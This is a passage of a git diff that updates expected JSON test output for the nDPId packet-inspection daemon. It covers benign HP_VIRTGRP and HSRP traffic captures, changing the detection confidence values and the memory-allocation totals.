00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1614894888628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614894888628,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnpjjVSzZFyy8+GWASchAxGQAAAgQFrAAA"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1614894888632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614894888632,"pkt":"eJS0JASgYDjgxTWgCABFAAAoczdAAD8Gox3AqAJkoCzCQqY4FGfLLz4Z1Us2RlAQ\/\/+63gAA"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614894888601,"flow_last_seen":1614894888640,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614894888640,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614894888601,"flow_last_seen":1614894888640,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614894888640,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":121,"packets-processed":120,"total-skipped-flows":0,"total-l4-payload-len":4583,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":55,"global_ts_msec":1614898090218} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614898090218,"flow_last_seen":1614898090218,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614898090218,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1614898090218,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614898090218,"pkt":"eJS0JASgYDjgxTWgCABFAAA8EFJAAD8GBe\/AqAJkoCzCQqcMFGeOCpYjAAAAAKAC\/\/+UDgAAAgQFtAQCCAoBYq1xAAAAAAEDAwg="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1614898090245,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614898090245,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnpwwosEHQjgqWJGASchC2bwAAAgQFrAAA"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1614898090249,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614898090249,"pkt":"eJS0JASgYDjgxTWgCABFAAAoEFNAAD8GBgLAqAJkoCzCQqcMFGeOCpYkKLBB0VAQ\/\/9ANQAA"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614898090218,"flow_last_seen":1614898090270,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614898090270,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614894888601,"flow_last_seen":1614895277767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614898090218,"flow_last_seen":1614898324173,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614892184461,"flow_last_seen":1614892314046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614898090218,"flow_last_seen":1614898090270,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614898090270,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614894888601,"flow_last_seen":1614895277767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42552,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614898090218,"flow_last_seen":1614898324173,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":42764,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614892184461,"flow_last_seen":1614892314046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1614898324173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":49838,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 
00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":135,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":135,"packets-processed":135,"total-skipped-flows":0,"total-l4-payload-len":5105,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":64,"global_ts_msec":1614898324173} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 135/135 @@ -70,9 +70,9 @@ ~~ total active/idle flows...: 9/9 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5900298 bytes -~~ total memory freed........: 5900298 bytes -~~ total allocations/frees...: 118291/118291 +~~ total memory allocated....: 6033932 bytes +~~ total memory freed........: 6033932 bytes +~~ total allocations/frees...: 121053/121053 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 457 chars ~~ json string max len.......: 696 chars diff --git a/test/results/hsrp0.pcap.out b/test/results/hsrp0.pcap.out index 053e3bf77..c4853d1cc 100644 --- a/test/results/hsrp0.pcap.out +++ b/test/results/hsrp0.pcap.out 
@@ -2,20 +2,20 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"hsrp0.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1126551970888} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551970888,"flow_last_seen":1126551970888,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551970888,"l3_proto":"ip4","src_ip":"10.28.168.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1126551970888,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1126551970888,"pkt":"AQBeAAACAAAMB6wKgQAACggARcAAMAAAAAABESXiChyo\/eAAAAIHwQfBABw\/0wAAEAMKWgoAY2lzY28AAAAKHKj+"} 
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551970888,"flow_last_seen":1126551970888,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551970888,"l3_proto":"ip4","src_ip":"10.28.168.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551970888,"flow_last_seen":1126551970888,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551970888,"l3_proto":"ip4","src_ip":"10.28.168.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971000,"l3_proto":"ip4","src_ip":"10.28.170.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1126551971000,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1126551971000,"pkt":"AQBeAAACAAAMB6wMgQAADAgARcAAMAAAAAABESPiChyq\/eAAAAIHwQfBABw50wAAEAMKWgwAY2lzY28AAAAKHKr+"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971000,"l3_proto":"ip4","src_ip":"10.28.170.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971000,"l3_proto":"ip4","src_ip":"10.28.170.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971000,"l3_proto":"ip4","src_ip":"10.28.171.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1126551971000,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1126551971000,"pkt":"AQBeAAACAAAMB6wNgQAADQgARcAAMAAAAAABESLiChyr\/eAAAAIHwQfBABw20wAAEAMKWg0AY2lzY28AAAAKHKv+"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971000,"l3_proto":"ip4","src_ip":"10.28.171.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 
+00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971000,"l3_proto":"ip4","src_ip":"10.28.171.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971931,"flow_last_seen":1126551971931,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.168.252","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1126551971931,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1126551971931,"pkt":"AQBeAAACABJ\/uh8CgQAACggARcAAMAAAAAABESXjChyo\/OAAAAIHwQfBABxH3gAACAMKUAoAY2lzY28AAAAKHKj+"} 
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971931,"flow_last_seen":1126551971931,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.168.252","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.171.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.170.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1126551971931,"flow_last_seen":1126551971931,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.168.252","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1126551970888,"flow_last_seen":1126551970888,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.168.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1126551971931,"flow_last_seen":1126551971931,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.168.252","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.171.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1126551971000,"flow_last_seen":1126551971000,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.170.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1126551971931,"flow_last_seen":1126551971931,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.168.252","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"hsrp0.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1126551970888,"flow_last_seen":1126551970888,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":20,"flow_tot_l4_payload_len":20,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1126551971931,"l3_proto":"ip4","src_ip":"10.28.168.253","dst_ip":"224.0.0.2","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 